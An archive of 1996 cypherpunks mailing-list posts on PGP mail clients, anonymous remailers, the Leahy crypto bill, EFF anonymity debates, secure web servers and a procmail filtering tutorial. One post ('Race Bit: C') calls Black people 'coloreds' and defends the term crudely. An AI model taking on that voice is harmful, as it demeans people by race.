http://execpc.com/~kbriggs - ------------------------------------------------------------ - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMi2o9SoZzwIn1bdtAQEBoAF+PjxvtAuPUnlMr9UGoIYhjgjPQ0Bs0GeE 5077GFz/pASkMfFvsh5uO6I9BBtpGMpI =P92s -----END PGP SIGNATURE----- From alano at teleport.com Wed Sep 4 12:55:19 1996 From: alano at teleport.com (Alan Olsen) Date: Thu, 5 Sep 1996 03:55:19 +0800 Subject: Mail OnNet Message-ID: <3.0b11.32.19960904090523.010d81e8@mail.teleport.com> At 05:10 PM 8/31/96 -0700, Joel McNamara wrote: >In my never-ending search for the perfect PGP e-mail client, I just stumbled >on to a beta of a product put out by FTP Software called Mail OnNet. Unlike >the Pronto Secure and Pegasus, this client actually has PGP code (licensed >from PGP Inc.) built directly in. No shelling out to DOS! It is very nice. It is a bit on the hard side to get. (Took me three tries. It seems to time out the transfer if it is not completed within a certain time frame. I guess that is what I get for trying to download all three parts at the same time.) It does have the beta nature however. I have found a couple of problems with the program that make it so that i will not use it beyond testing. The people at FTP have been very responsive to e-mail, so I expect the problems to be fixed soon. They also seem to have no idea as to what it will retail for. With proper marketing, Eudora could be in real trouble. >Very nice interface and almost complete idiot-proof >encrypting/decrypting/signing. Extremely powerful rules based processing too. The interface design is very clean. (It is nice seeing well designed dialog boxes in a product. I have been using too much shareware lately I guess...) The rules processing looks to be very powerful. (Puts Eudora 3.0 to shame.) >Check out: > >http://www.ftp.com/mkt_info/onnet32/try.htm > >IMHO, this is getting very close to transparent secure e-mail for the masses. Now all they need is a remailer interface. >Two notes. (1) It only runs under Win95 and NT. (2) It's ITAR restricted. (3) It is bigger than a battleship. The distribution is just shy of 10 megs. Installed it is supposed to be about 45 megs. (In perspective, a full install of Visual Basic 4.0 "Professional" is about 50 megs.) --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From jf_avon at citenet.net Wed Sep 4 13:20:04 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Thu, 5 Sep 1996 04:20:04 +0800 Subject: Letter to the Observer [re: Internet paedophile] Message-ID: <9609041639.AA25461@cti02.citenet.net> On 4 Sep 96 at 5:41, Martin Minow wrote: > Forwarded to me by a friend: > The following letters were delivered to the Editor of the Observer > last week as a request to publish a retraction of their article > relating to the Internet that appeared on Sunday 25th. August. One way to limit or retaliate against diffamation would be to refuse internet access to anybody known to be part of any such medias, being tv or paper. ISPs would probably easily agree since the revenues coming from journalists vs from the general population is probably minuscule. Of course, the conventionnal media would set up their own ISP but they could be identified. Does that makes sense or am I out to lunch? jfa Jean-Francois Avon DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal JFA Technologies, R&D consultants: physicists, technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From jf_avon at citenet.net Wed Sep 4 13:27:31 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Thu, 5 Sep 1996 04:27:31 +0800 Subject: [troll] Re: Workers of the Web, UNITE! Message-ID: <9609041643.AA25642@cti02.citenet.net> On 4 Sep 96 at 6:38, Martin Minow wrote: > >Tired: Libertarian cypherpunks > >Wired: Crypto-socialists > > > The Wobblies are a prime example of Tom Leherer's comment: > "They won all of the battles, but we had all the good songs." > Up the Revolution. > Martin (crypto social democrat) Minow? What is a missing "n" on the net? Everybody makes typos nowadays... Minow? Sound like a little living thing used as a lure on a troll, isn't it? jfa From tcmay at got.net Wed Sep 4 13:32:26 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 04:32:26 +0800 Subject: Race Bit: C Message-ID: At 3:02 AM 9/4/96, James A. Donald wrote: >At 10:33 PM 9/3/96 -0800, jim bell wrote: >>>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>>use of encryption to thwart a law-enforcement investigation illegal." I >>>immediately pointed out that while this wouldn't make _encrypted_ remailers >>>illegal, per se, effectively it would because the moment an investigation >>>(even a phony or trumped-up one) is started and is "thwarted" by the >>>encryption used, the remailer operator became guilty of a crime. ... >I believe that judges have a policy of interpreting deliberately >ambiguous statutes in whatever way makes the most sense. The only >sensible interpretation of Leahy's bill is that it criminalizes >strong remailers, that it is intended to punish ANYONE, not just >the criminals themselves, who obstructs investigations. As the recent discussion of knives, switchblades, and throwing stars showed, such ambiguous laws are often used to keep the coloreds down. But how will cops and local prosecutors know which users of remailers are colored? Answer: the race bit must be set on all posts. --Klaus (P.S. More than one of you has expressed anger to me that I am using the term "colored." As in "what the coloreds are doing." I use this term deliberately, because the perfectly fine term "black" is now being replaced by the ultra-awkward and stupid-sounding "person of color." We have even seen this in posts to this list. Here in Santa Cruz, the terms in use are: people of color, students of color, lesbians of color, etc. Only about 17.32% of the entire population is _not_ "persons of color." I say, "Fuck it...they want to be called "colored," then, fine, they're "colored."") We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From snow at smoke.suba.com Wed Sep 4 13:40:58 1996 From: snow at smoke.suba.com (snow) Date: Thu, 5 Sep 1996 04:40:58 +0800 Subject: Moscowchannel.com hack In-Reply-To: <199609031548.KAA04410@shade.sctc.com> Message-ID: On Tue, 3 Sep 1996, Rick Smith wrote: > : On Sat, 31 Aug 1996, Joel McNamara wrote: > : > Just a matter of time before some builds a dedicated Satan type tool that > : > scans for HTTP server holes or messed up file permissions to make locating > : > potential victims easy. > Snow replied: > : Write your web site to a CD-ROM and hard-code the base directory into the > : webserver. > Or host it on something with mandatory access control protections. > There are still a handful of us building such things, and they can > give really good protection to web page contents. Could you illuminate me on this subject please? I am working with a potential client who may need a fairly secure web server. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jimbell at pacifier.com Wed Sep 4 13:46:19 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 5 Sep 1996 04:46:19 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609041702.KAA15781@mail.pacifier.com> At 08:02 PM 9/3/96 -0700, James A. Donald wrote: >At 10:33 PM 9/3/96 -0800, jim bell wrote: >>>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>>use of encryption to thwart a law-enforcement investigation illegal." I >>>immediately pointed out that while this wouldn't make _encrypted_ remailers >>>illegal, per se, effectively it would because the moment an investigation >>>(even a phony or trumped-up one) is started and is "thwarted" by the >>>encryption used, the remailer operator became guilty of a crime. > >At 07:10 AM 9/4/96 -0500, Jon Lebkowsky wrote: >> Is that true? Or is it that the individual user would be guilty of a crime? > >Since the individual user would already be guilty of a crime, if he is >using the remailer to conceal his crimes, the paragraph in question would >be fairly useless and irrelevant unless it had the meaning that Jim Bell >attributes to it. > >I believe that judges have a policy of interpreting deliberately >ambiguous statutes in whatever way makes the most sense. The only >sensible interpretation of Leahy's bill is that it criminalizes >strong remailers, that it is intended to punish ANYONE, not just >the criminals themselves, who obstructs investigations. Moreover, this "spreading the responsibility" philosophy ties in with the recent practices (both in the civil and criminal areas) of passing blame around. In civil areas, it's called "deep pockets." In the criminal area, you occasionally see news items about laws making parents criminally liable for the actions of their children. Why WOULDN'T the police want to shut down anonymous remailers? The Leahy bill clearly didn't distinguish between remailer operators and users, so it is no leap to conclude that they would be treated similarly. Jim Bell jimbell at pacifier.com From jfricker at vertexgroup.com Wed Sep 4 13:48:51 1996 From: jfricker at vertexgroup.com (John F. Fricker) Date: Thu, 5 Sep 1996 04:48:51 +0800 Subject: 2^1,257,787-1 Message-ID: <2.2.32.19960904165452.006dd000@vertexgroup.com> Ok so maybe here in Organ we are a little behind the times but I just heard about this 378,632 digit prime. Grab your HP11C's and crank out 2^1,257,787-1 courtesy of David Slowinski at Cray. From nosferat at atcon.com Wed Sep 4 14:35:10 1996 From: nosferat at atcon.com (Stephen Charchuk) Date: Thu, 5 Sep 1996 05:35:10 +0800 Subject: No Subject Message-ID: From declan at eff.org Wed Sep 4 14:56:34 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 5 Sep 1996 05:56:34 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960904115249.006b6580@mail.well.com> Message-ID: Harassment in person when someone is shouting at you in the street, spittle flying in your face, is one thing. Online "harassment," I believe, is a problem that can be solved with technical means. Don't like someone? Killfile them. -Declan On Wed, 4 Sep 1996, Jon Lebkowsky wrote: > At 07:44 AM 9/3/96 -0700, James A. Donald wrote: > >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: > >> Not necessarily. The character of the anonymous speech is decisive. If you > >> use anonymity to cloak harassment, for instance, the anonymity (which > >> removes accountability) is a problem. The accountability issue is real and > >> should be addressed, not evaded. > > > >No: The harassment is the problem, not the anonymity that makes it > >possible. > > The harassment is one problem, the lack of accountability another. Which is > not to say that 'lack of accountability' should be 'fixed' by some sort of > blanket restriction...but it should be acknowledged as a problem. > > -- > Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl > Electronic Frontiers Forum, 6PM PDT Thursdays > "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky > // declan at eff.org // I do not represent the EFF // declan at well.com // From paul at fatmans.demon.co.uk Wed Sep 4 15:10:06 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 5 Sep 1996 06:10:06 +0800 Subject: (Fwd) Re: Secure anonymouse server protocol: comments please Message-ID: <841849157.2629.0@fatmans.demon.co.uk> ------- Forwarded Message Follows ------- From: Adamsc at io-online.com (Adamsc) To: "paul at fatmans.demon.co.uk" On Mon, 2 Sep 1996 19:24:23 +0000, paul at fatmans.demon.co.uk wrote: >This system has 1 huge fault, we can encrypt a uses ID with the >servers public key to see what his ID in the encrypted database is >and therefore identify him, maybe we need two seperate server public >keys, and when IDs come in encrypted with key1 (the one it releases) >it decrypts with secretkey1 then encrypts with publickey2 (the one it >keeps secret) >or maybe we can just hash and sign the IDs in the database? >as I said it`s very sketchy, I made most of this up as I wrote it so >if you must tear it to pieces please do so constructively, it could >be the route to a secure system.... How about this: do the exchange *every* time. Never reuse a key. That way at most 1 message could be easily snagged (by seeing where it goes). It'd be processor intensive, but it avoids the whole reuse problem - where you store an ID to be used to retrieve all messages. Also, software could be written to do the key computation solely on the client - after all, the server doesn't care if they pass themselves a dud key, right? Let them crunch it. Put all those Pentiums to work! ... Better idea, I hadn`t thought of that, anyone else care to comment on a way to solve this? - how did the nymservers do it???? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From tcmay at got.net Wed Sep 4 15:10:19 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 06:10:19 +0800 Subject: What is the EFF doing exactly? Message-ID: At 11:52 AM 9/4/96, Jon Lebkowsky wrote: >At 07:44 AM 9/3/96 -0700, James A. Donald wrote: >>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >>> Not necessarily. The character of the anonymous speech is decisive. If you >>> use anonymity to cloak harassment, for instance, the anonymity (which >>> removes accountability) is a problem. The accountability issue is real and >>> should be addressed, not evaded. >> >>No: The harassment is the problem, not the anonymity that makes it >>possible. > >The harassment is one problem, the lack of accountability another. Which is >not to say that 'lack of accountability' should be 'fixed' by some sort of >blanket restriction...but it should be acknowledged as a problem. It has been. In many hundreds of articles addressing aspects of the issue. The fact that Esther Dyson and others think advocates of the right to be anonymous claim that these issues are not being considered just shows that Esther and others are not aware of these many articles. Nor can every brief post--such as the one James Donald made above--include a fully-nuanced, fully-balanced discussion of all issues. Saying that an advocate for a position has not considered the alternate positions is usually incorrect. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 4 15:15:29 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 06:15:29 +0800 Subject: 2^1,257,787-1 Message-ID: At 4:54 PM 9/4/96, John F. Fricker wrote: >Ok so maybe here in Organ we are a little behind the times but I just heard >about this 378,632 digit prime. Grab your HP11C's and crank out >2^1,257,787-1 courtesy of David Slowinski at Cray. The news sites on the Web I looked at had the announcement, but not the number. Thanks. I've already modified my .sig. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From janzen at idacom.hp.com Wed Sep 4 15:17:58 1996 From: janzen at idacom.hp.com (Martin Janzen) Date: Thu, 5 Sep 1996 06:17:58 +0800 Subject: How to use procmail Message-ID: <9609041821.AA27906@sabel.idacom.hp.com> "Damaged Justice" writes: > Would some kind soul out there be willing to instruct a novice in the > mysteries of procmail? I've finally decided to start killfiling my mail > as well as my news. A fine idea. Procmail makes the Cypherpunks list infinitely more readable. 1) First, here's how to get it: ---------------------- A recent version can be picked up at various comp.sources.misc archives. The latest version can be obtained directly from the ftp-archive at: amaru.informatik.rwth-aachen.de (137.226.112.31) as compressed tar file: pub/unix/procmail.tar.Z <100KB or in compressed shar format: pub/unix/procmail.0?.Z ---------------------- 2) Build the procmail program and install it in a suitable location. I have no idea what your familiarity with UNIX and C is; you may want to have your sysadmin help you with this. Alternatively, you could use Alta Vista or equivalent to search for binaries for your system. 3) Create a file of procmail "recipes", which tell it how to process your mail. This file is called "$HOME/.procmailrc". Mine begins like this; fix up directory names as needed for your system: ----------------------- # # $HOME/.procmailrc - procmail recipe file # PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin:$HOME/bin/700o:$HOME/bin ME= janzen HOME= /Home/$ME LOGFILE= $HOME/.procmaillog MAILDIR= $HOME/Mail ORGMAIL= /usr/mail/$ME DEFAULT= $ORGMAIL TMP= $HOME/tmp SENDMAIL= /usr/lib/sendmail TMPFILE= $TMP/procmail.$$ LOCKFILE= $HOME/Mail/.procmail # toss out junk mail :1 ^Subject:.*unsubscribe /dev/null # sort mail from mailing lists into the proper folders :1 cypherpunks Cypherpunks ----------------------- The last part sorts all mail whose header contains the word "cypherpunks" into the folder $MAILDIR/Cypherpunks. Now the fun part -- writing your "recipes"! You can get as specific as you want: ----------------------- # kill a particular thread :2 ^To:.*cypherpunks at toad.com ^Subject:.*Workers of the /dev/null # ignore a particular user :2 cypherpunks patrickbc at juno.com /dev/null # I haven't tried this one, but any subject with too many consecutive # capitals is probably spam or worse. Separate it out, but don't toss # it just yet. :2 cypherpunks ^Subject:.*[A-Z][A-Z][A-Z][A-Z][A-Z][A-Z] ProbableSpam # search the whole message body, not just the headers, for probable spam :1HB ^dear friend ProbableSpam # put everything else in the incoming Cypherpunks mail folder :1 ^To:.*cypherpunks at toad.com NewCypherpunksMail ----------------------- Rules are evaluated in top-to-bottom order; first matching rule wins. Anything not matched ends up in your usual $ORGMAIL folder. 4) Run your incoming mail through procmail. To do this, most Unix systems let you create a file called "$HOME/.forward" with the following contents (including the quotes): "| IFS=' '; /usr/local/bin/procmail -p" (Replace "/usr/local/bin" with the directory in which you installed procmail.) 5) One thing to watch out for: procmail is executed on the machine which handles your mail. If this machine has a different architecture than your own machine, you must build procmail for the mail handling machine, not your own. Also, the permissions on your $HOME/.forward and $HOME/.procmailrc files must be set so that they are readable on the mail handling machine. If your home directory is NFS-mounted, this should happen automatically; otherwise, you may need to copy them to the mail handling machine manually. Finally, the procmail process may not have your userid, so you must make these files world-readable: chmod 644 $HOME/.forward $HOME/.procmailrc For the first day or two, check your $HOME/.procmaillog file frequently to see whether there are any problems. Check with your sysadmin to make sure that your mail isn't ending up "all over the floor". Send yourself mail to test "recipes". 6) Once it's running smoothly, you can get fancy and run the following shell script, which reads the $HOME/.procmaillog file and produces a nice summary, sorted by mail folder: ------------------------------------------------------------------------------- #!/bin/sh # Summarize the ~/.procmaillog file LOGFILE=${LOGFILE:=$HOME/.procmaillog} echo "Subject: Procmail Summary" echo " " sort ${LOGFILE} | /usr/bin/awk ' /^ Folder:/ { folder = $2; nbytes = $3; msgcount[folder] += 1; totalbytes[folder] += nbytes; } END { for (folder in msgcount) printf "Folder %s:\tsaved %d messages (%d bytes)\n", \ folder, msgcount[folder], totalbytes[folder]; } ' if [ "$1" = "-clear" ]; then rm -f $LOGFILE; fi ------------------------------------------------------------------------------- To arrange to have it run daily, I use the following crontab entry: 0 7 * * * /Home/janzen/bin/pmsumm.sh -clear | elm -s "Procmail Summary" janzen which means, "At 7:00AM every morning, run the pmsumm.sh script, use the Elm mailer to mail the output to me, and then clear $HOME/.procmaillog". See the "cron" man page for your system, and/or talk to your sysadmin, since this varies among different flavors of Unix. Hope this helps... -- Martin Janzen janzen at idacom.hp.com From vznuri at netcom.com Wed Sep 4 15:25:37 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 5 Sep 1996 06:25:37 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609040057.RAA01205@mail.pacifier.com> Message-ID: <199609041827.LAA29523@netcom20.netcom.com> jim bell >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many >decades, people have been able to walk up to a pay telephone at 3:00 AM and >make a harassing phone call to somebody, a "problem" which still exists and >no solution is being implemented for. amusing the way you phrase that-- you didn't say, "phone", but "pay phone". the statement used to hold in general for all "phones", but then caller id, caller blocking, etc. have been introduced that make this no longer true. so in a very real sense, anonymity in the phone system was considered a "problem" by some that has been "solved" or "modified" by some recent advancements. (yes, most people agree caller ID is an advancement). I think cpunks should hold the view that communication is a matter of mutual consent between sender and receiver. if a receiver says, "I don't want any anonymous messages", then should be able to block them. this is essentially what is happening with the remailers *right*now*, if you ask any remailer operator. people ask not to receive anonymous mail, and are put on the blocking lists. imho only the extremists are arguing, and have always argued, that they should have some ability to put an anonymous message in front of someone else against their will. this basic rule becomes more murky when you look at public forums, because you can't really say whether given individuals reading them want to hear something anonymous or not. by designing the forum beforehand to force the situation, you solve this problem. I do believe that in the future there will be all types of forums: those in which identity is required, those in which it is optional, and those in which it is always cloaked. this is eminently reasonable imho. those who argue against one of the above's existence (such as saying it involves a ghettoization of anonymity, that there should always be an ability to be anonymous in any communication setting) are extremists imho. the above is almost exactly what Dyson was saying, and I have been advocating this position for a long time. again, I think anyone who rejects the above is an extremist. there are different ways to support or restrict anonymity, some of them extremist. those who argue for no restrictions anywhere don't have a clue about reality imho. From smith at sctc.com Wed Sep 4 15:36:01 1996 From: smith at sctc.com (Rick Smith) Date: Thu, 5 Sep 1996 06:36:01 +0800 Subject: Protecting Web servers (was: Moscowchannel.com hack) Message-ID: > Could you illuminate me on this subject please? I am working with a >potential client who may need a fairly secure web server. Years ago, the government published some criteria for highly secure systems, notably the TCSEC or "Orange Book," which described requirements for protecting classified information on a timesharing system with uncleared users. Several vendors managed to build such systems, though very few were judged secure enough to really protect classified data from uncleared users. However, the underlying mechanisms of "mandatory access control" do manage to block a range of sophisticated attacks against the host computer. These are the systems given the various B and A ratings: B1, B2, B3, A1 (in ascending order of security). Also-ran systems that can keep honest people from tripping over one another were given "C" ratings, though "C2" is all you see any more. A few vendors are putting Web servers and such on systems with mandatory protection. I've heard talk of it from SecureWare, HP, Harris, and AT&T using B1 or B1-like systems. Pardon the plug, but our Sidewinder also hosts a protected Web server and uses mandatory protection to prevent Internet attacks from damaging it. In practice, I've found that most customers just want to demonstrate "due diligence" regarding security. They pick up whatever's popular in the marketplace that has some pretention of strong security ("We're C2 rated by the government!!"). It's a rare customer that actually takes the time to look at the security issues and consider whether they might need what mandatory protection provides. Rick. smith at sctc.com secure computing corporation From vznuri at netcom.com Wed Sep 4 15:43:35 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 5 Sep 1996 06:43:35 +0800 Subject: flimflamery on anonymity In-Reply-To: <199609041557.IAA00970@dns1.noc.best.net> Message-ID: <199609041839.LAA00713@netcom20.netcom.com> james donald: >Lucky Green and Dark Unicorn are not accountable. This is a problem? > Because it is a problem "We" need to do something about it, (last line is sarcasm for the sarcasm impaired) a cpunk position I have seen repeated often. it goes along a very simplistic line of reasoning that I have seen TCM evoke repeatedly. it rather annoys me. it goes like this: cyberspace is merely discussion between people. anonymity should be allowed anywhere there are discussions (its a free speech issue). therefore it should be possible everywhere in cyberspace. this idea lacks a lot of subtlety in thought and to my mind is tremendously simplistic. first, it suggests that cyberspace as we now see it is the way it will always be. but that is ridiculous. what we have today in cyberspace is something like a sophomoric debate society. it's gradually increasing in professionalism with the rise of web sites etc. cyberspace is going to grow to become a lot more than a debate society, and is in this progress right now. whenever challenged on anonymity in certain contexts, the extremist cpunk position is to blur the issue into one of free speech. but the issue is much different if we are talking about a professional situation. scientists demand that each other be "accountable" for their work, for example, and pseudonymous publication simply would not be acceptable. cpunks will also argue that anonymity can suffice for any business transaction. that may be so, but what about a business that simply says, "we choose to require identity among our customers, and you can go elsewhere if you disagree". the extremist cypherpunks would be in a quandary over this example, because they think they can support anarchocapitalist freedom and anonymity at the same time. they will argue that such a business will one day not exist. but shouldn't a business be free to make this decision? rabid cpunks would probably argue against such a decision. cyberspace as a whole is *not* going to lead to a totlal motion away from physical identity. in some ways physical identity will be more strictly enforced in cyberspace, in "some regions". there will be other regions of cyberspace in which "anything goes". anyway, I want to emphasize my main point, that *anonymity* is not merely about debate societies. it's about human interaction. any time two or more humans interact in a host of ways that go beyond communication (such as business transactions, professional societies, etc) its going far beyond mere speech. of course in the cpunk mailing list, who cares if there are anonymous/pseudonymous participants? but using this as a metaphor for anonymity in general shows a pathetic lack of sophistication in thinking, imho. there is nothing at stake here on this mailing list except reputations and egos. but far more is at stake in the "real world" and the risks posed by anonymity will be adequately diluted because of this. and it won't be by people who are all "f***ing statists"-- it will be by reasonable people such as those who head EFF, who are interested in a civilized society. "cryptoanarchy"--? if what is being connoted by this is no one knowing anyone else's true identity-- sure, in places, if you go looking for them. but it will be the invisible underside, not the mainstream of society. From unicorn at schloss.li Wed Sep 4 16:03:02 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 07:03:02 +0800 Subject: EFF chairwoman: Anonymity proven not to be a positive factor In-Reply-To: Message-ID: On Mon, 2 Sep 1996, Ulf Moeller wrote: > >From a Scientology magazine: > > Esther Dyson, member of the board of directors of the Electronic > Frontier Foundation and member of the National Information > Infrastructure Advisory Council, spoke on the anonymity issue at the > fifth Computers, Freedom & Privacy (CFP) conference in San Francisco. > > [...] > "I have a concern about the spread > of bad behavior on the Net," said Dyson. "Anonymity figures into this, > and I feel that it has proven to not be a positive factor. It breaks > down the community which we are seeking to build, and cout protection > and privacy laws already exist and should be applied in a broad way, > such that they are transparent to new wrinkles in the technology. It > is not necessary to view the world of the Net as different from the > rest of the world." I think EFF needs to make attempts to clear up this mess. > > http://www.anonymizer.com:8080/http://www.theta.com/goodman/hijack.htm > > > [For EFF's former position on anonymity, see > http://ftp.sterling.com:80/COAST/doc/law+ethics/EFF-Anonymity] > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From james at corp.netcom.net.uk Wed Sep 4 16:28:39 1996 From: james at corp.netcom.net.uk (James Fidell) Date: Thu, 5 Sep 1996 07:28:39 +0800 Subject: Letter to the Observer [re: Internet paedophile] In-Reply-To: <9609041639.AA25461@cti02.citenet.net> Message-ID: <199609041954.UAA04906@corp.netcom.net.uk> Jean-Francois Avon wrote: > On 4 Sep 96 at 5:41, Martin Minow wrote: > > > Forwarded to me by a friend: > > > The following letters were delivered to the Editor of the Observer > > last week as a request to publish a retraction of their article > > relating to the Internet that appeared on Sunday 25th. August. > > One way to limit or retaliate against diffamation would be to refuse > internet access to anybody known to be part of any such medias, being > tv or paper. > > ISPs would probably easily agree since the revenues coming from > journalists vs from the general population is probably minuscule. Of > course, the conventionnal media would set up their own ISP but they > could be identified. > > Does that makes sense or am I out to lunch? I don't think it makes sense. The media would be the first to point the finger at the ISPs for censorship in such a case, one imagines (whether it could be justified or not is a different matter of course). James. -- "Yield to temptation -- | Work: james at corp.netcom.net.uk it may not pass your way again" | Play: james at hermione.demon.co.uk | http://www.netcom.net.uk/~james/ - Lazarus Long | James Fidell From unicorn at schloss.li Wed Sep 4 16:33:26 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 07:33:26 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960903115249.006e7bfc@mail.well.com> Message-ID: On Tue, 3 Sep 1996, Jon Lebkowsky wrote: > "Uncompromising" is not an "element of legislative influence," at least not > on this planet. Explain that to the tobbacco lobby. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From claborne at CYBERTHOUGHT.com Wed Sep 4 16:38:18 1996 From: claborne at CYBERTHOUGHT.com (Christian Claborne) Date: Thu, 5 Sep 1996 07:38:18 +0800 Subject: San Diego CPunk Physical meeting this Thursday Message-ID: <2.2.32.19960904195619.002c4b20@cyberthought.com> -----BEGIN PGP SIGNED MESSAGE----- <<<<< NOTE! I have a new address!!! >>>>>> This Thursday!!! San Diego Area CPUNKS symposium Thursday, Sep. 5, 1996. Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop". We discuss cryptography and other related subjects, have the special cypherpunk dinner, and unwind after a long day at the grind stone. Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool. If you want the suspicious crowd there to sign your key, bring two forms of ID. Hopefully Lance Cottrell will give us an update on Mixmaster and what's going on at San Diego's best ISP. You can also get the scoop on why I resigned from NCR. It wouldn't of course be because someone freaked out when I forwarded the cypherpunk e-mail titled "How to become in international Arms trafficker"... Place: The Mission Cafe & Coffee Shop 3795 Mission Bl in Mission Beach. 488-9060 Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and garnett. It's kind of 40s looking building... funky looking (their description, not mine) They serve stuff to eat, coffee stuff, and beer. See you there! New guy, bring your fingerprint. Drop me a note if you plan to attend... NOTE: My primary e-mail address has changed to use my own domain. You can reach me at "claborne at cyberthought.com". Permanently replace any other address that you may have for me. I am currently not subscribed to the CP list since my current internet connection is slow (I can't afford anything right now :) 2 -- C -- -----BEGIN PGP SIGNATURE----- Version: 4.0 Personal Edition iQEVAgUBMi3ezYP1MBWQ+9udAQE/QAf/W/tdXCFx57p17tlXT0WbtZHPK2riMC2j 5golSBxmP5t0X6SbM0DYz9b8kq6FWrqTJ9hVKQhGHiiZVqRo6AcbYM9SlFM54x6E TFMKB6WzBp7h2DPqAeFZKuP2yGIhZaMns8fDS4EZIYHeH63DjEuhmwtM//iGe9KI txHFiQUKi0cQWGNfqeowpESfbO0HppFbsmgj9z9KTg2gFRpPpXQLP3vXJ9Dg0/IK gd5AiT+BTE2OOORS3OCmIUTC3vDI1acu/d2MNVOFuIBOkwH5y/mGf1pMndIW0++v eC+3j27wJyUbSumxM6+iVn+gu0mE7QB6YPllB9FbihkYNNfzWejyuA== =obLu -----END PGP SIGNATURE----- ... __o .. -\<, Claborne at CYBERTHOUGHT.com ...(*)/(*)._ Providing thoughts on your computing problems. http://www.CYBERTHOUGHT.com/cyberthought/ PGP Pub Key fingerprint = 7E BF 38 3F 24 A7 D1 B0 54 44 96 AA 10 D0 5D 51 Avail on Pub Key server. PGP-encrypted e-mail welcome! Dreams. They are just a "screen saver" for the brain. From declan at well.com Wed Sep 4 16:46:33 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 5 Sep 1996 07:46:33 +0800 Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail Message-ID: Toronto Sun, 04sep96 Sneaky photographer charged ... by Tom Godfrey A retired high school shop teacher has been charged after a man allegedly used a camera hidden in his size 12 shoe to secretly videotape up the skirts of young women at the CNE. Det. Mike Beauparlant said a man photographed up to 20 women with his "shoe cam," which contained about seven hours of footage when he was arrested at the CNE last Saturday night. Beauparlant said investigators believe he got the idea from surfing a voyeur news group on the Internet. He ordered a $400 fibre optic lens and fastened it in a brogue shoe, police allege. The Oxford-style footwear contained a false front and two small screws on the sole to which a bracket and lens were affixed. "I've never seen anything like this in my 21 years on the force," Beauparlant said. "This was ingenious." Beauparlant said the body of the camera was hidden in a waist pouch and connected to the lens on the shoe with wires that 